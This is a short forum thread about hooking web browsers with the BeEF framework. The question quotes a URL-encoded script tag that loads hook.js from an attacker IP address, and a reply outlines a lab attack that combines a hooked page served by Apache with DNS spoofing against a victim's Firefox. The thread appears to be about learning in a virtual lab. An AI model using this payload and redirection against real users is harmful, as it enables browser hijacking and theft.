BeEF how to hook

So I am trying to use BeEF for the first time and I understand I need to hook a web browser. And there are a lot of tutorials online on how to use BeEF but they skip over how to hook. This website http://www.denialtech.com/kali/Beef-XSS-tutorial/57 is the best example on how to hook but is not very detailed. Inserting the script <script%2Bsrc%253d"http://10.10.20.50:3000/hook.js"%2Btype%253d"text/javascript"> into a template and uploading it to a web server is very clear but what happens I have not compromised a web server is there anyway to still hook the victim? i replace a tutorial (linked in your post) & test on my virtual lab(kali vmware attacker 192.168.1.7-eth0) && (win10 host victim pc with firefox 192.168.1.44-phisical eth0) && router (192.168.1.1)...
After download a super-basic template ..insert the """"script-string"""..&...save-it in /var/www/html/index.html.>Start my dnsspoof,>Start my apache2 &>Start my Beef...seems to work versus victim-firefox!
